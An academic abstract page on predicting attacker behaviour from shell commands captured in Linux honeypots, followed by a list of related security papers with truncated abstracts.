Analysis of Attacker Behavior in Compromised Hosts During Command and Control

by   Farhan Sadique, et al.

Traditional reactive approach of blacklisting botnets fails to adapt to the rapidly evolving landscape of cyberattacks. An automated and proactive approach to detect and block botnet hosts will immensely benefit the industry. Behavioral analysis of botnet is shown to be effective against a wide variety of attack types. Current works, however, focus solely on analyzing network traffic from and to the bots. In this work we take a different approach of analyzing the chain of commands input by attackers in a compromised host. We have deployed several honeypots to simulate Linux shells and allowed attackers access to the shells to collect a large dataset of commands. We have further developed an automated mechanism to analyze these data. For the automation we have developed a system called CYbersecurity information Exchange with Privacy (CYBEX-P). Finally, we have done a sequential analysis on the dataset to show that we can successfully predict attacker behavior from the shell commands without analyzing network traffic like previous works.


Modeling and Analyzing Attacker Behavior in IoT Botnet using Temporal Convolution Network (TCN)

Traditional reactive approach of blacklisting botnets fails to adapt to ...

Security Orchestration, Automation, and Response Engine for Deployment of Behavioural Honeypots

Cyber Security is a critical topic for organizations with IT/OT networks...

Secure (S)Hell: Introducing an SSH Deception Proxy Framework

Deceiving an attacker in the network security domain is a well establish...

A Memo on the Proof-of-Stake Mechanism

We analyze the economic incentives generated by the proof-of-stake mecha...

A Large-Scale Analysis of Attacker Activity in Compromised Enterprise Accounts

We present a large-scale characterization of attacker activity across 11...

An Adaptive Pruning Algorithm for Spoofing Localisation Based on Tropical Geometry

The problem of spoofing attacks is increasingly relevant as digital syst...

A Qualitative Empirical Analysis of Human Post-Exploitation Behavior

Honeypots are a well-studied defensive measure in network security. This...